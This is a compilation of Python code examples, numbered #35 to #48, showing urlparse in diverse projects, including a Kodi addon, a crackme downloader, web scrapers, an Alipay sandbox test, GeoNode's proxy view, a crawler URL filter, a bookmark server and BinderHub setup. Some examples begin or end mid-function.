        self._globals['__plugin__'] = self._globals['addon'].getAddonInfo(
            'name')
        self._globals['__authors__'] = self._globals['addon'].getAddonInfo(
            'author')
        self._globals['__credits__'] = ""
        self._globals['__version__'] = self._globals['addon'].getAddonInfo(
            'version')

        # OS Detection
        if xbmc.getCondVisibility('system.platform.windows'):
            self._globals['platform'] |= self.OS_WINDOWS
        if xbmc.getCondVisibility('system.platform.linux'):
            self._globals['platform'] |= self.OS_LINUX
        if xbmc.getCondVisibility('system.platform.osx'):
            self._globals['platform'] |= self.OS_OSX
        if xbmc.getCondVisibility('system.platform.android'):
            self._globals['platform'] |= self.OS_ANDROID
        if (xbmcvfs.exists('/etc/os-release')) and (
                'libreelec' in xbmcvfs.File('/etc/os-release').read()):
            self._globals['platform'] |= self.OS_LE

        # Save the language code for HTTP requests and set the locale for l10n
        loc = getdefaultlocale()[0]
        userAcceptLanguages = 'en-gb{}, en;q=0.5'
        self._globals['userAcceptLanguages'] = userAcceptLanguages.format(
            '') if not loc else '{}, {}'.format(
                loc.lower().replace('_', '-'),
                userAcceptLanguages.format(';q=0.75'))

        self._globals['CONTEXTMENU_MULTIUSER'] = [
            (getString(30130, self._globals['addon']).split('…')[0],
             'RunPlugin({}?mode=LogIn)'.format(self.pluginid)),
            (getString(30131, self._globals['addon']).split('…')[0],
             'RunPlugin({}?mode=removeUser)'.format(self.pluginid)),
            (getString(30132, self._globals['addon']),
             'RunPlugin({}?mode=renameUser)'.format(self.pluginid))
        ]
Example #35
0
 def _file_url_to_local_url(self, url: str) -> str:
     parsed = urlparse(url)
     if not parsed.path.startswith("/packages"):
         raise RuntimeError(f"Got invalid download URL: {url}")
     prefix = self.root_uri if self.root_uri else "../.."
     return prefix + parsed.path
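A short sketch of the path handling above, with a hypothetical download URL and no root_uri configured (so the relative ../.. prefix is used):

from urllib.parse import urlparse

url = 'https://files.example.org/packages/ab/cd/example-1.0.tar.gz'  # hypothetical
parsed = urlparse(url)
assert parsed.path.startswith('/packages')
root_uri = ''  # hypothetical: no explicit root configured
prefix = root_uri if root_uri else '../..'
print(prefix + parsed.path)  # ../../packages/ab/cd/example-1.0.tar.gz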
Example #36
0
import sys
import wget
import zipfile
import subprocess
from urllib.parse import urlparse

password = b'crackmes.one'

if __name__ == '__main__':

    if len(sys.argv) == 2:
        url = sys.argv[1]
    else:
        url = input('enter url : ')

    u_parse = urlparse(url)
    token = u_parse.path.split('/')[-1]
    print(f'downloading "{token}.zip"... ', end='')

    file_name = wget.download(
        f'https://crackmes.one/static/crackme/{token}.zip',
        out=f'zips/{token}.zip',
        bar=None)

    print('\tdone')

    print('extracting files... ', end='')
    z_file = zipfile.ZipFile(file_name)
    z_file.setpassword(password)
    z_file.extractall()
Example #37
0
 def __init__(self, filename):
     filename = filename.strip()
     if not urlparse(filename).scheme:
         filename = 'http://' + filename
     super().__init__(filename)
Example #38
0
async def data_extraction_for_web_baidu(client, html):
    with async_timeout.timeout(20):
        try:
            # Get the h5 snippet
            url = html.select('h3.t a')[0].get('href', None)
            # Get the href attribute content  -
            # First - html.select('h3.t a')[0]
            # < a
            # data - click = "{
            # 'F': '778317EA',
            # 'F1': '9D73F1E4',
            # 'F2': '4DA6DD6B',
            # 'F3': '54E5363F',
            # 'T': '1497109660',
            # 'y': 'A7BFAFBF'
            #
            # }" href="
            # http: // www.baidu.com / link?url = w2bV3ST9FFL3f39PGG6VUhT10aqZ1GNZrhWa5BIclVak7hYZEh1wGiTsvrGYJgXJEAPNoPfS7x0X4xK9nLDzJK
            # " target="
            # _blank
            # "><em>择天记</em>,<em>择天记</em>最新章节,<em>择天记</em>无弹窗,88读书网</a>

            # Then - get('href', None)
            # http: // www.baidu.com / link?url = w2bV3ST9FFL3f39PGG6VUhT10aqZ1GNZrhWa5BIclVak7hYZEh1wGiTsvrGYJgXJEAPNoPfS7x0X4xK9nLDzJK

            real_url = await get_real_url(client=client,
                                          url=url) if url else None
            if real_url:
                netloc = urlparse(str(real_url)).netloc
                # >> > import urlparse
                # >> > url = urlparse.urlparse('http://www.baidu.com/index.php?username=guol')
                # >> > print
                # url
                # ParseResult(scheme='http', netloc='www.baidu.com', path='/index.php', params='', query='username=guol',
                #             fragment='')
                # >> > print
                # url.netloc
                # www.baidu.com
                if 'baidu' in str(real_url) or netloc in BLACK_DOMAIN:
                    return None
                #print('--------------------')
                #print(RULES.keys())
                is_parse = 1 if netloc in RULES.keys() else 0
                title = html.select('h3.t a')[0].get_text()
                # time = re.findall(r'\d+-\d+-\d+', source)
                # time = time[0] if time else None
                timestamp = 0
                time = ""
                # if time:
                #     try:
                #         time_list = [int(i) for i in time.split('-')]
                #         timestamp = arrow.get(time_list[0], time_list[1], time_list[2]).timestamp
                #     except Exception as e:
                #         LOGGER.exception(e)
                #         timestamp = 0
                return {
                    'title': title,
                    'url': str(real_url).replace('index.html', ''),
                    'time': time,
                    'is_parse': is_parse,
                    'timestamp': timestamp,
                    'netloc': netloc
                }
            else:
                return None
        except Exception as e:
            LOGGER.exception(e)
            return None
Example #39
0
 def make_button(i, url):
     return '%d - %s' % (i + 1, urlparse(url).hostname)
Example #40
0
 def extract_params(fileName, paramsDict):
     params = urlparse(paramsDict['sourceUrl'])
     path = os.path.split(params.path)[-1]
     return list(os.path.split(fileName)) + [path]
Example #41
0
def conform(srcjson, destdir, extras):
    ''' Python wrapper for openaddresses-conform.
    
        Return a ConformResult object:

          processed: URL of processed data CSV
          path: local path to CSV of processed data
          geometry_type: typically Point or Polygon
          elapsed: elapsed time as timedelta object
          output: subprocess output as string
        
        Creates and destroys a subdirectory in destdir.
    '''
    start = datetime.now()
    source, _ = splitext(basename(srcjson))
    workdir = mkdtemp(prefix='conform-', dir=destdir)
    
    with open(srcjson, 'r') as src_file:
        data = json.load(src_file)
        data.update(extras)
    
    #
    # The cached data will be a local path.
    #
    scheme, _, cache_path, _, _, _ = urlparse(extras.get('cache', ''))
    if scheme == 'file':
        copy(cache_path, workdir)

    source_urls = data.get('cache')
    if not isinstance(source_urls, list):
        source_urls = [source_urls]

    task1 = URLDownloadTask(source)
    downloaded_path = task1.download(source_urls, workdir)
    _L.info("Downloaded to %s", downloaded_path)

    task2 = DecompressionTask.from_type_string(data.get('compression'))
    names = elaborate_filenames(data.get('conform', {}).get('file', None))
    decompressed_paths = task2.decompress(downloaded_path, workdir, names)
    _L.info("Decompressed to %d files", len(decompressed_paths))

    task3 = ExcerptDataTask()
    try:
        conform = data.get('conform', {})
        data_sample, geometry_type = task3.excerpt(decompressed_paths, workdir, conform)
        _L.info("Sampled %d records", len(data_sample))
    except Exception as e:
        _L.warning("Error doing excerpt; skipping", exc_info=True)
        data_sample = None
        geometry_type = None

    task4 = ConvertToCsvTask()
    try:
        csv_path, addr_count = task4.convert(data, decompressed_paths, workdir)
        _L.info("Converted to %s with %d addresses", csv_path, addr_count)
    except Exception as e:
        _L.warning("Error doing conform; skipping", exc_info=True)
        csv_path, addr_count = None, 0

    out_path = None
    if csv_path is not None and exists(csv_path):
        move(csv_path, join(destdir, 'out.csv'))
        out_path = realpath(join(destdir, 'out.csv'))

    rmtree(workdir)
    
    sharealike_flag = conform_sharealike(data.get('license'))
    attr_flag, attr_name = conform_attribution(data.get('license'), data.get('attribution'))

    return ConformResult(data.get('processed', None),
                         data_sample,
                         data.get('website'),
                         conform_license(data.get('license')),
                         geometry_type,
                         addr_count,
                         out_path,
                         datetime.now() - start,
                         sharealike_flag,
                         attr_flag,
                         attr_name)
Example #42
0
        if signer.verify(digest, decodebytes(signature.encode("utf8"))):
            return True
        return False

    def verify(self, data, signature):
        if "sign_type" in data:
            sign_type = data.pop("sign_type")
        # the string after sorting
        unsigned_items = self.ordered_data(data)
        message = "&".join(u"{}={}".format(k, v) for k, v in unsigned_items)
        return self._verify(message, signature)


if __name__ == "__main__":
    return_url = 'https://openapi.alipay.com/gateway.do?timestamp=2013-01-01 08:08:08&method=alipay.trade.page.pay&app_id=16388&sign_type=RSA2&sign=ERITJKEIJKJHKKKKKKKHJEREEEEEEEEEEE&version=1.0&charset=GBK&biz_content=AlipayTradePageCreateandpayModel'
    o = urlparse(return_url)
    query = parse_qs(o.query)
    processed_query = {}
    ali_sign = query.pop("sign")[0]


# Test case
    alipay = AliPay(
        # appid value from the Alipay sandbox
        appid="2021000116669532",
        # notify_url is the asynchronous notification URL
        app_notify_url="http://39.103.172.179:8000/alipay/return/",
        # our own merchant private key
        app_private_key_path="../trade/keys/private_key_2048.txt",
        # Alipay's public key
        alipay_public_key_path="../trade/keys/ali_public_key_2048.txt",  # Alipay's public key, used to verify messages returned by Alipay; not your own public key,
Example #43
0
    def parse_links(self, html, keyword):
        links_title = []
        total_count = []
        registration_date_latest = []
        social_count = 0
        q_a_count = 0
        forum_count = 0
        affiliate_count = 0
        other_count = 0
        root_count = 0
        page_count = 0
        below_1 = 0
        below_2 = 0
        more_than = 0
        registration_date = []
        soup = BeautifulSoup(html, "html.parser")
        try:
            snippet = soup.select_one(".ifM9O").find('h2', class_="bNg8Rb")
            if snippet:
                snipper_string = "Yes"
            else:
                snipper_string = "No"
        except Exception:
            snipper_string = "No"

        for title in soup.find_all("p", class_='nVcaUb'):
            try:
                search_suggestion = title.get_text()
                if search_suggestion.startswith("best") or search_suggestion.endswith("review") or \
                        search_suggestion.endswith("reviews"):
                    columns = ["Search Keywords", "Search Suggestion Result"]
                    suggestion_result = [keyword, search_suggestion]
                    # Create a zip object from two lists
                    searchObj = zip(columns,  suggestion_result)
                    # Create a dictionary from zip object
                    seachofWords = dict(searchObj)
                    # print(registration_date)
                    x = mycol_3.insert_one(seachofWords)
            except Exception:
                pass
        for item in soup.find_all("div", class_='r'):
            rows = item.find('a')
            try:
                title = rows.find('h3').get_text()
            except Exception:
                title = ""
            try:
                url = rows.get('href')
            except Exception:
                url = ""
            links_title.append([title, url])

        for i in range(len(links_title)):
            ext = tldextract.extract(links_title[i][1])
            url = ext.domain + "." + ext.suffix
            try:
                w = whois.whois(url)
                try:
                    start_date = w.creation_date[0]
                    registration_date.extend([url, datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S').date().strftime("%m/%d/%Y")])
                    registration_date_latest.append(datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S').
                                                    date())
                except:
                    start_date = w.creation_date
                    registration_date.extend([url, datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S').date().strftime("%m/%d/%Y")])
                    registration_date_latest.append(datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S').
                                                    date())
            except:
                creation_date = ''
                registration_date.extend([url, creation_date])

            try:
                now = datetime.datetime.now()
                start = datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S').date()
                ends = datetime.datetime.strptime(str(now), '%Y-%m-%d %H:%M:%S.%f').date()
                diff = relativedelta(ends, start)
                if diff.years < 1:
                    below_1 += 1
                elif diff.years == 1:
                    below_2 += 1
                else:
                    more_than += 1
            except:
                pass

            root_page = urlparse(links_title[i][1]).path
            if root_page and root_page != '/':
                page_count += 1
            else:
                root_count += 1

            check_social_share = pd.Series(social_share)
            check_q = pd.Series(qa_site)
            if ext.domain in check_social_share.values:
                social_count += 1
            elif ext.domain in check_q.values or ext.subdomain in check_q:
                q_a_count += 1
            else:
                aff_match = [True for match in affiliate if match in links_title[i][0].lower()]
                f_match = [True for match in forum if match in links_title[i][1]]
                if True in f_match or any(regex.match(links_title[i][1]) for regex in regexes_forum):
                    forum_count += 1
                    subdomain_remove_www = ext.subdomain.replace("www", "")
                    if subdomain_remove_www:
                        subdomain_remove_www = subdomain_remove_www.replace(".", "")
                        subdomain = subdomain_remove_www + "."
                    else:
                        subdomain = ""
                    forum_url = subdomain + ext.domain + "." + ext.suffix
                    forum_links.append(forum_url)
                elif True in aff_match:
                    affiliate_count += 1
                else:
                    other_count += 1
            if i == len(links_title) - 1:
                max_r = 11 - len(links_title)
                for mr in range(0, max_r):
                    value_empty = ""
                    url = ""
                    registration_date.extend([url, value_empty])
                total_count = [keyword, social_count, q_a_count, forum_count, affiliate_count, other_count,
                               snipper_string, root_count, page_count, below_1, below_2, more_than]
                total_count.extend(registration_date)
                if registration_date_latest:
                    latest_date = max(registration_date_latest).strftime("%m/%d/%Y")
                    # oldest_date = min(registration_date_latest).strftime("%m/%d/%Y")
                else:
                    latest_date = ""
                    # oldest_date = ""
                total_count.extend([latest_date])
                # self.analysis_data.append(total_count)
                final_url_links = list(dict.fromkeys(forum_links))
                for url_link in final_url_links:
                    myquery_link = {"Forum Url": url_link}
                    mydoc_link = mycol_2.find_one(myquery_link)
                    if mydoc_link is None:
                        # print(url_link)
                        columns_fourms = ["Forum Url"]
                        forum_final_url_links = [url_link]
                        # Create a zip object from two lists
                        forumbObj = zip(columns_fourms, forum_final_url_links)

                        # Create a dictionary from zip object
                        forumOfWords = dict(forumbObj)
                        # print(registration_date)
                        x = mycol_2.insert_one(forumOfWords)
                columns = ["Search Keywords", "Social Sharing Site", "Q/A Site", "Forum",
                           "Affiliate Site", "Other", "Snippet", "Root", "Page",
                           "Below 1", "Below 2", "More than", "Site1 Root", "Site1",
                           "Site2 Root", "Site2", "Site3 Root", "Site3", "Site4 Root", "Site4", "Site5 Root", "Site5",
                           "Site6 Root", "Site6", "Site7 Root", "Site7", "Site8 Root", "Site8", "Site9 Root", "Site9",
                           "Site10 Root", "Site10", "Site11 Root", "Site11", "Latest Registration Date"]
                # Create a zip object from two lists
                zipbObj = zip(columns, total_count)

                # Create a dictionary from zip object
                dictOfWords = dict(zipbObj)
                #print(registration_date)
                x = mycol.insert_one(dictOfWords)
Example #44
0
def proxy(request, url=None, response_callback=None,
          sec_chk_hosts=True, sec_chk_rules=True, timeout=None,
          allowed_hosts=[], **kwargs):
    # Request default timeout
    if not timeout:
        timeout = TIMEOUT

    # Security rules and settings
    PROXY_ALLOWED_HOSTS = getattr(settings, 'PROXY_ALLOWED_HOSTS', ())

    # Sanity url checks
    if 'url' not in request.GET and not url:
        return HttpResponse("The proxy service requires a URL-encoded URL as a parameter.",
                            status=400,
                            content_type="text/plain"
                            )

    raw_url = url or request.GET['url']
    raw_url = urljoin(
        settings.SITEURL,
        raw_url) if raw_url.startswith("/") else raw_url
    url = urlsplit(raw_url)
    scheme = str(url.scheme)
    locator = str(url.path)
    if url.query != "":
        locator += f"?{url.query}"
    if url.fragment != "":
        locator += f"#{url.fragment}"

    # White-Black Listing Hosts
    site_url = urlsplit(settings.SITEURL)
    if sec_chk_hosts and not settings.DEBUG:

        # Attach current SITEURL
        if site_url.hostname not in PROXY_ALLOWED_HOSTS:
            PROXY_ALLOWED_HOSTS += (site_url.hostname, )

        # Attach current hostname
        if check_ogc_backend(geoserver.BACKEND_PACKAGE):
            from geonode.geoserver.helpers import ogc_server_settings
            hostname = (
                ogc_server_settings.hostname,
            ) if ogc_server_settings else ()
            if hostname not in PROXY_ALLOWED_HOSTS:
                PROXY_ALLOWED_HOSTS += hostname

        # Check OWS regexp
        if url.query and ows_regexp.match(url.query):
            ows_tokens = ows_regexp.match(url.query).groups()
            if len(ows_tokens) == 4 and 'version' == ows_tokens[0] and StrictVersion(
                    ows_tokens[1]) >= StrictVersion("1.0.0") and StrictVersion(
                        ows_tokens[1]) <= StrictVersion("3.0.0") and ows_tokens[2].lower() in (
                            'getcapabilities') and ows_tokens[3].upper() in ('OWS', 'WCS', 'WFS', 'WMS', 'WPS', 'CSW'):
                if url.hostname not in PROXY_ALLOWED_HOSTS:
                    PROXY_ALLOWED_HOSTS += (url.hostname, )

        # Check Remote Services base_urls
        from geonode.services.models import Service
        for _s in Service.objects.all():
            _remote_host = urlsplit(_s.base_url).hostname
            PROXY_ALLOWED_HOSTS += (_remote_host, )

        if not validate_host(
                url.hostname, PROXY_ALLOWED_HOSTS):
            return HttpResponse("DEBUG is set to False but the host of the path provided to the proxy service"
                                " is not in the PROXY_ALLOWED_HOSTS setting.",
                                status=403,
                                content_type="text/plain"
                                )

    # Security checks based on rules; allow only specific requests
    if sec_chk_rules:
        # TODO: Not yet implemented
        pass

    # Collecting headers and cookies
    headers, access_token = get_headers(request, url, raw_url, allowed_hosts=allowed_hosts)

    # Inject access_token if necessary
    parsed = urlparse(raw_url)
    parsed._replace(path=locator.encode('utf8'))
    if parsed.netloc == site_url.netloc and scheme != site_url.scheme:
        parsed = parsed._replace(scheme=site_url.scheme)

    _url = parsed.geturl()

    # Some clients / JS libraries generate URLs with relative URL paths, e.g.
    # "http://host/path/path/../file.css", which the requests library cannot
    # currently handle (https://github.com/kennethreitz/requests/issues/2982).
    # We parse and normalise such URLs into absolute paths before attempting
    # to proxy the request.
    _url = URL.from_text(_url).normalize().to_text()

    if request.method == "GET" and access_token and 'access_token' not in _url:
        query_separator = '&' if '?' in _url else '?'
        _url = f'{_url}{query_separator}access_token={access_token}'

    _data = request.body.decode('utf-8')

    # Avoid translating local geoserver calls into external ones
    if check_ogc_backend(geoserver.BACKEND_PACKAGE):
        from geonode.geoserver.helpers import ogc_server_settings
        _url = _url.replace(
            f'{settings.SITEURL}geoserver',
            ogc_server_settings.LOCATION.rstrip('/'))
        _data = _data.replace(
            f'{settings.SITEURL}geoserver',
            ogc_server_settings.LOCATION.rstrip('/'))

    response, content = http_client.request(
        _url,
        method=request.method,
        data=_data.encode('utf-8'),
        headers=headers,
        timeout=timeout,
        user=request.user)
    if response is None:
        return HttpResponse(
            content=content,
            reason=content,
            status=500)
    content = response.content or response.reason
    status = response.status_code
    content_type = response.headers.get('Content-Type')

    if status >= 400:
        return HttpResponse(
            content=content,
            reason=content,
            status=status,
            content_type=content_type)

    # decompress GZipped responses if not enabled
    # if content and response and response.getheader('Content-Encoding') == 'gzip':
    if content and content_type and content_type == 'gzip':
        buf = io.BytesIO(content)
        with gzip.GzipFile(fileobj=buf) as f:
            content = f.read()
        buf.close()

    PLAIN_CONTENT_TYPES = [
        'text',
        'plain',
        'html',
        'json',
        'xml',
        'gml'
    ]
    for _ct in PLAIN_CONTENT_TYPES:
        if content_type and _ct in content_type and not isinstance(content, str):
            try:
                content = content.decode()
                break
            except Exception:
                pass

    if response and response_callback:
        kwargs = {} if not kwargs else kwargs
        kwargs.update({
            'response': response,
            'content': content,
            'status': status,
            'content_type': content_type
        })
        return response_callback(**kwargs)
    else:
        # If we get a redirect, let's add a useful message.
        if status and status in (301, 302, 303, 307):
            _response = HttpResponse((f"This proxy does not support redirects. The server in '{url}' "
                                      f"asked for a redirect to '{response.getheader('Location')}'"),
                                     status=status,
                                     content_type=content_type
                                     )
            _response['Location'] = response.getheader('Location')
            return _response
        else:
            def _get_message(text):
                _s = text
                if isinstance(text, bytes):
                    _s = text.decode("utf-8", "replace")
                try:
                    found = re.search('<b>Message</b>(.+?)</p>', _s).group(1).strip()
                except Exception:
                    found = _s
                return found

            return HttpResponse(
                content=content,
                reason=_get_message(content) if status not in (200, 201) else None,
                status=status,
                content_type=content_type)
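A minimal standalone sketch of the query-string handling used above for the access_token injection; it uses hypothetical values and is not GeoNode's API, but shows that ParseResult._replace() returns a new object and that parse_qsl/urlencode is a safer way to append a parameter than string concatenation:

from urllib.parse import urlparse, parse_qsl, urlencode, urlunparse

def append_query_param(url, key, value):
    """Return `url` with `key=value` added to (or replacing any existing) query parameter."""
    parsed = urlparse(url)
    query = dict(parse_qsl(parsed.query, keep_blank_values=True))
    query[key] = value
    # _replace() does not mutate `parsed`; it returns a new ParseResult
    return urlunparse(parsed._replace(query=urlencode(query)))

# append_query_param('http://example.org/wms?service=WMS', 'access_token', 'abc')
# -> 'http://example.org/wms?service=WMS&access_token=abc'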
Example #45
0
    def is_valid(self, url):
        """
        Returns True or False based on whether the URL should be fetched. This is a good place to
        filter out crawler traps. Duplicate URLs are handled by the frontier, so there is no need
        to check for duplication in this method.
        """
        word_count = 0

        parsed = urlparse(url)

        ## Begin invalid-URL checks
        if parsed.scheme not in {"http", "https"}:
            return False

        if "calendar." in url or "/calendar" in url:
            traps.append(url + '\n\t\tTraps: Calendar included- may create infinite webpages')
            return False

        if len(url.split("/")) > 10 and '..' not in url:
            traps.append(url + "\n\t\tTraps: Recursive paths detected")
            return False

        elif (len(url.split('/')) - len(set(url.split('/'))) > 1) and 'http' not in set(url.split('/')) and '..' not in url:
            traps.append(url + "\n\t\tTraps: Repeat Directories detected")
            return False

        elif len(parsed.query.split("&")) > 2 and '..' not in url:
            traps.append(url + "\n\t\tTraps: Too many queries-may be dynamic page\n")
            return False

        #################
        # Checks complete; the URL is valid, so record its statistics:
        if '.' in parsed.netloc:
            subdomain = parsed.netloc.split(':')[0]
            if 'www' in subdomain.split('.'):
                subdomain = '.'.join(subdomain.split('.')[1:])
            self.subcnt[subdomain] += 1

        downloaded_all_urls.add(url)

        # put all the words in this page into a counter
        # text_string = self.url_data["content"].lower()
        # match_pattern = re.findall(r'\b[a-z]{3,15}\b', str(text_string))
        # word_count = len(match_pattern)
        # for i in match_pattern:
        #     self.cnt[i] += 1
        #
        # # check if this page has most words
        # if word_count > longest_page[1]:
        #     longest_page[0] = url
        #     longest_page[1] = word_count
        #################


        try:
            return ".ics.uci.edu" in parsed.hostname \
                   and not re.match(".*\.(css|js|bmp|gif|jpe?g|ico" + "|png|tiff?|mid|mp2|mp3|mp4" \
                                    + "|wav|avi|mov|mpeg|ram|m4v|mkv|ogg|ogv|pdf" \
                                    + "|ps|eps|tex|ppt|pptx|doc|docx|xls|xlsx|names|data|dat|exe|bz2|tar|msi|bin|7z|psd|dmg|iso|epub|dll|cnf|tgz|sha1" \
                                    + "|thmx|mso|arff|rtf|jar|csv" \
                                    + "|rm|smil|wmv|swf|wma|zip|rar|gz|pdf)$", parsed.path.lower())

        except TypeError:
            print("TypeError for ", parsed)
            return False
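A small standalone sketch (hypothetical URL) of the urlparse fields the checks above rely on:

from urllib.parse import urlparse

parsed = urlparse('https://www.ics.uci.edu/~user/page.php?a=1&b=2&c=3')
assert parsed.scheme == 'https'
assert parsed.netloc == 'www.ics.uci.edu'
assert parsed.hostname == 'www.ics.uci.edu'      # lower-cased, port stripped
assert parsed.path == '/~user/page.php'
assert len(parsed.query.split('&')) == 3         # the trap check above flags more than two parameters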
Example #46
0
def create_app(db_file=None):
    """create app."""
    app = FlaskAPI(__name__)
    per_page = int(
        os.getenv('BUKUSERVER_PER_PAGE', str(views.DEFAULT_PER_PAGE)))
    per_page = per_page if per_page > 0 else views.DEFAULT_PER_PAGE
    app.config['BUKUSERVER_PER_PAGE'] = per_page
    url_render_mode = os.getenv('BUKUSERVER_URL_RENDER_MODE',
                                views.DEFAULT_URL_RENDER_MODE)
    if url_render_mode not in ('full', 'netloc'):
        url_render_mode = views.DEFAULT_URL_RENDER_MODE
    app.config['BUKUSERVER_URL_RENDER_MODE'] = url_render_mode
    app.config['SECRET_KEY'] = os.getenv(
        'BUKUSERVER_SECRET_KEY') or os.urandom(24)
    app.config['BUKUSERVER_DISABLE_FAVICON'] = \
        get_bool_from_env_var('BUKUSERVER_DISABLE_FAVICON', True)
    app.config['BUKUSERVER_OPEN_IN_NEW_TAB'] = \
        get_bool_from_env_var('BUKUSERVER_OPEN_IN_NEW_TAB', False)
    app.config['BUKUSERVER_DB_FILE'] = os.getenv(
        'BUKUSERVER_DB_FILE') or db_file
    reverse_proxy_path = os.getenv('BUKUSERVER_REVERSE_PROXY_PATH')
    if reverse_proxy_path:
        if not reverse_proxy_path.startswith('/'):
            print('Warning: reverse proxy path should include preceding slash')
        if reverse_proxy_path.endswith('/'):
            print(
                'Warning: reverse proxy path should not include trailing slash'
            )
        app.config['REVERSE_PROXY_PATH'] = reverse_proxy_path
        if ReverseProxyPrefixFix:
            ReverseProxyPrefixFix(app)
        else:
            raise ImportError('Failed to import ReverseProxyPrefixFix')
    bukudb = BukuDb(dbfile=app.config['BUKUSERVER_DB_FILE'])
    app.app_context().push()
    setattr(flask.g, 'bukudb', bukudb)

    @app.shell_context_processor
    def shell_context():
        """Shell context definition."""
        return {'app': app, 'bukudb': bukudb}

    app.jinja_env.filters['netloc'] = lambda x: urlparse(x).netloc  # pylint: disable=no-member

    Bootstrap(app)
    admin = Admin(app,
                  name='buku server',
                  template_mode='bootstrap3',
                  index_view=views.CustomAdminIndexView(
                      template='bukuserver/home.html', url='/'))
    # routing
    #  api
    tag_api_view = ApiTagView.as_view('tag_api')
    app.add_url_rule('/api/tags',
                     defaults={'tag': None},
                     view_func=tag_api_view,
                     methods=['GET'])
    app.add_url_rule('/api/tags/<tag>',
                     view_func=tag_api_view,
                     methods=['GET', 'PUT'])
    bookmark_api_view = ApiBookmarkView.as_view('bookmark_api')
    app.add_url_rule('/api/bookmarks',
                     defaults={'rec_id': None},
                     view_func=bookmark_api_view,
                     methods=['GET', 'POST', 'DELETE'])
    app.add_url_rule('/api/bookmarks/<int:rec_id>',
                     view_func=bookmark_api_view,
                     methods=['GET', 'PUT', 'DELETE'])
    app.add_url_rule('/api/bookmarks/refresh',
                     'refresh_bookmark',
                     refresh_bookmark,
                     defaults={'rec_id': None},
                     methods=['POST'])
    app.add_url_rule('/api/bookmarks/<int:rec_id>/refresh',
                     'refresh_bookmark',
                     refresh_bookmark,
                     methods=['POST'])
    app.add_url_rule('/api/bookmarks/<int:rec_id>/tiny',
                     'get_tiny_url',
                     get_tiny_url,
                     methods=['GET'])
    app.add_url_rule('/api/network_handle',
                     'network_handle',
                     handle_network,
                     methods=['POST'])
    bookmark_range_api_view = ApiBookmarkRangeView.as_view(
        'bookmark_range_api')
    app.add_url_rule('/api/bookmarks/<int:starting_id>/<int:ending_id>',
                     view_func=bookmark_range_api_view,
                     methods=['GET', 'PUT', 'DELETE'])
    bookmark_search_api_view = ApiBookmarkSearchView.as_view(
        'bookmark_search_api')
    app.add_url_rule('/api/bookmarks/search',
                     view_func=bookmark_search_api_view,
                     methods=['GET', 'DELETE'])
    bookmarklet_view = BookmarkletView.as_view('bookmarklet')
    app.add_url_rule('/bookmarklet',
                     view_func=bookmarklet_view,
                     methods=['GET'])
    #  non api
    admin.add_view(
        views.BookmarkModelView(bukudb,
                                'Bookmarks',
                                page_size=per_page,
                                url_render_mode=url_render_mode))
    admin.add_view(views.TagModelView(bukudb, 'Tags', page_size=per_page))
    admin.add_view(
        views.StatisticView(bukudb, 'Statistic', endpoint='statistic'))
    return app
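The 'netloc' Jinja filter registered above simply reduces a bookmark URL to its host for the compact render mode; a one-line sketch with a hypothetical URL:

from urllib.parse import urlparse

assert urlparse('https://docs.python.org/3/library/urllib.parse.html').netloc == 'docs.python.org'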
Example #47
0
def is_safe_url(target):
	ref_url = urlparse(request.host_url)
	test_url = urlparse(urljoin(request.host_url, target))
	return test_url.scheme in ('http', 'https') and ref_url.netloc == test_url.netloc
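A minimal usage sketch showing where a guard like is_safe_url() typically sits; it assumes a Flask app, a hypothetical `next` query parameter and a hypothetical 'index' endpoint, none of which come from the example above:

from flask import Flask, redirect, request, url_for

app = Flask(__name__)

@app.route('/login', methods=['POST'])
def login():
    # ... authenticate the user here ...
    target = request.args.get('next')
    # only follow the redirect if it stays on our own host
    if target and is_safe_url(target):
        return redirect(target)
    return redirect(url_for('index'))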
Example #48
0
    def initialize(self, *args, **kwargs):
        """Load configuration settings."""
        super().initialize(*args, **kwargs)
        self.load_config_file(self.config_file)
        # hook up tornado logging
        if self.debug:
            self.log_level = logging.DEBUG
        tornado.options.options.logging = logging.getLevelName(self.log_level)
        tornado.log.enable_pretty_logging()
        self.log = tornado.log.app_log

        self.init_pycurl()

        # initialize kubernetes config
        if self.builder_required:
            try:
                kubernetes.config.load_incluster_config()
            except kubernetes.config.ConfigException:
                kubernetes.config.load_kube_config()
            self.tornado_settings[
                "kubernetes_client"] = self.kube_client = kubernetes.client.CoreV1Api(
                )

        # times 2 for log + build threads
        self.build_pool = ThreadPoolExecutor(self.concurrent_build_limit * 2)
        # default executor for asyncifying blocking calls (e.g. to kubernetes, docker).
        # this should not be used for long-running requests
        self.executor = ThreadPoolExecutor(self.executor_threads)

        jinja_options = dict(autoescape=True, )
        template_paths = [self.template_path]
        base_template_path = self._template_path_default()
        if base_template_path not in template_paths:
            # add base templates to the end, so they are looked up at last after custom templates
            template_paths.append(base_template_path)
        loader = ChoiceLoader([
            # first load base templates with prefix
            PrefixLoader({'templates': FileSystemLoader([base_template_path])},
                         '/'),
            # load all templates
            FileSystemLoader(template_paths)
        ])
        jinja_env = Environment(loader=loader, **jinja_options)
        if self.use_registry and self.builder_required:
            registry = DockerRegistry(parent=self)
        else:
            registry = None

        self.launcher = Launcher(
            parent=self,
            hub_url=self.hub_url,
            hub_url_local=self.hub_url_local,
            hub_api_token=self.hub_api_token,
            create_user=not self.auth_enabled,
        )

        self.event_log = EventLog(parent=self)

        for schema_file in glob(os.path.join(HERE, 'event-schemas', '*.json')):
            with open(schema_file) as f:
                self.event_log.register_schema(json.load(f))

        self.tornado_settings.update({
            "log_function":
            log_request,
            "push_secret":
            self.push_secret,
            "image_prefix":
            self.image_prefix,
            "debug":
            self.debug,
            "launcher":
            self.launcher,
            "appendix":
            self.appendix,
            "ban_networks":
            self.ban_networks,
            "ban_networks_min_prefix_len":
            self.ban_networks_min_prefix_len,
            "build_namespace":
            self.build_namespace,
            "build_image":
            self.build_image,
            "build_node_selector":
            self.build_node_selector,
            "build_pool":
            self.build_pool,
            "sticky_builds":
            self.sticky_builds,
            "log_tail_lines":
            self.log_tail_lines,
            "pod_quota":
            self.pod_quota,
            "per_repo_quota":
            self.per_repo_quota,
            "per_repo_quota_higher":
            self.per_repo_quota_higher,
            "repo_providers":
            self.repo_providers,
            "use_registry":
            self.use_registry,
            "registry":
            registry,
            "traitlets_config":
            self.config,
            "google_analytics_code":
            self.google_analytics_code,
            "google_analytics_domain":
            self.google_analytics_domain,
            "about_message":
